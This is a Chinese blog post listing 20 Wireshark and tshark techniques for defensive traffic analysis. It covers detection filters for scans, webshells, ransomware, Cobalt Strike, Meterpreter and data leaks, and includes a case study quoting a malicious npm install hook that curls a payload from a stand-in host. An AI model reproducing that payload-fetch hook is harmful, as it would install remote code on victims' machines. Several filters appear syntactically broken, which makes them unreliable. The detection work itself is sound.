20个Wireshark在网络安全分析中的实战技巧

admin 2025年7月9日01:23:43评论8 views字数 3119阅读10分23秒阅读模式

一、基础配置篇

  1. 1. 安全捕获环境搭建
# 创建隔离分析环境
sudo ip linkset eth0 promisc on
sudo tcpdump -i eth0 -s 0 -w /mnt/isolated/evidence.pcap
  1. 2. 预置过滤模板
# 高危协议快速过滤
tcp.port in {135,139,445,3389} || udp.port in {53,123,161,500,4500}
  1. 3. 关键字段标记
  • • 右键点击IP → Apply as Column
  • • 将TTL异常值设为显眼红色(TTL<64 or TTL>128)

二、攻击检测篇

  1. 4. 扫描行为识别
# SYN扫描检测
tcp.flags.syn==1and tcp.flags.ack==0and tcp.window_size <=1024
  1. 5. 暴力破解捕获
# SSH爆破特征
tcp.port==22and (tcp.flags.reset==1or tcp.analysis.retransmission)
  1. 6. DNS隐蔽隧道
# 检测长域名请求
dns and frame.len > 256 && !contains(dns.qry.name,".google.")
  1. 7. WebShell通信特征
http.content_type=="application/octet-stream" 
&& http.request.method=="POST"
&& frame.len >1024
  1. 8. 勒索软件通信
tcp contains "GET /decrypt_instructions"
|| tls.handshake.extensions_server_name=="lockbit"

三、数据泄露监控

  1. 9. 信用卡外泄检测
frame matches "\b[3456]\d{3}[ -]?\d{4}[ -]?\d{4}[ -]?\d{4}\b"
  1. 10. 数据库拖库行为
mysql.query contains "SELECT" 
&& frame.len >1500
&& tcp.srcport==3306
  1. 11. 云凭据泄露
http.request.uri contains "?AccessKeyId="
|| tls contains "AKIA"

四、高级威胁狩猎

  1. 12. Cobalt Strike检测
# Beacon心跳包特征
tcp.payload matches "\x00\x00\x00..\xff\xff\xff"
&& tcp.len between 20and50
  1. 13. Metasploit载荷识别
http contains "Meterpreter"
|| tcp contains "core_loadlib"
  1. 14. 域渗透横向移动
smb || kerberos 
&& (ip.src==<域控IP>or ip.dst==<域控IP>)
  1. 15. 内存攻击特征
tcp contains "\x90\x90\x90"# NOP sled检测
|| http contains ".dll"

五、加密流量分析

  1. 16. TLS指纹识别
# 检测恶意JA3指纹
tls.handshake.ja3 contains "6734f37431670b3ab4292b8f60f29984"
  1. 17. 证书异常检测
tls.handshake.certificate 
&& (x509sat.uTF8String == "Phishing Ltd" 
|| x509ce.dNSName == "freevpn.malicious.ru")

六、应急响应实战

  1. 18. 攻击时间轴重建
tshark -r attack.pcap -T fields -e frame.time 
-e ip.src -e ip.dst -e tcp.port > timeline.csv
  1. 19. 恶意文件提取
# 从HTTP流量中提取PE文件
tshark -r infection.pcap --export-object http,./malware
  1. 20. 攻击者画像生成
# 提取攻击链关键信息
echo"=== C2服务器 ==="
tshark -r c2.pcap -Y "dns" -T fields -e dns.qry.name

echo"=== 用户代理 ==="
tshark -r c2.pcap -Y "http.user_agent" -T fields -e http.user_agent

七、法律合规要点

  • • 取证规范:全程使用editcap保留原始时间戳
  • • 哈希校验sha256sum evidence.pcap > chain_of_custody.txt
  • • 隐私过滤:使用tcprewrite匿名化用户数据
tcprewrite --infile=raw.pcap --outfile=anon.pcap 
--dstipmap=192.168.1.0/24:10.0.0.0/24

八、真实攻击案例分析

案例1:供应链攻击溯源

  1. 1. 捕获异常NPM包更新请求:
HTTP/1.1200 OK
Content-Type: application/json
{"version":"1.2.3","scripts":{"install":"curl http://mal-registry.com/payload.sh"}}
  1. 2. 追踪关联IP:
tshark -r breach.pcap -Y "ip.addr==203.0.113.5" -z conv,ip

案例2:金融木马通信解密

  1. 1. 提取恶意DLL中的RC4密钥
  2. 2. Wireshark配置协议解密:
Protocols -> TLS -> (Pre)-Master-Secret log: /path/to/keys.log

九、高阶技巧拓展

  • • 流量基线比对:使用capinfos建立正常流量指纹
capinfos -Tm -r baseline.pcap > baseline_profile.txt
  • • AI辅助分析:集成Suricata告警日志
tshark -r traffic.pcap -Y "frame.comment contains 'ET PHISHING'"
  • • 工控协议解析:自定义Modbus/TCP解析器
dissector_add_uint("tcp.port"502, modbus_handle);

十、重要提醒

  1. 1. 三层验证原则:流量特征+行为模式+外部情报
  2. 2. 避免分析陷阱
    • • 勿将CDN IP误判为攻击源
    • • 识别合法的云服务通信(如AWS metadata)
  3. 3. 持续更新知识库
    • • 每日更新GeoIP2数据库
    • • 订阅威胁情报Feeds

某次金融攻防演练中,攻击者使用域前置技术隐藏C2通信。防守方通过Wireshark发现异常:

HTTP/2200 OK  
:authority: legit-cdn.com
x-amz-cf-pop: SIN2-C1 # 新加坡节点

但TLS证书却显示:

x509ce.dNSName: c2-malicious.tk

正是这0.5秒的协议解析差异,阻止了千万级资金损失

附:分析师必备过滤库

# 内网横向移动检测
smb || ldap || winrm || wmi

# 加密挖矿特征
tcp contains "stratum+tcp"
|| http contains "xmr"

# 钓鱼页面识别
http contains "login"
&& http contains "password"
&& !(http.host contains "corp")

当0day攻击发生时,EDR可能沉默、防火墙可能失效,但流过网卡的数据包永远是最诚实的证人。掌握这20项核心技能,意味着你拥有了穿透网络迷雾的终极武器。

原文始发于微信公众号(HACK之道):20个Wireshark在网络安全分析中的实战技巧

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2025年7月9日01:23:43
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   20个Wireshark在网络安全分析中的实战技巧https://cn-sec.com/archives/4233739.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息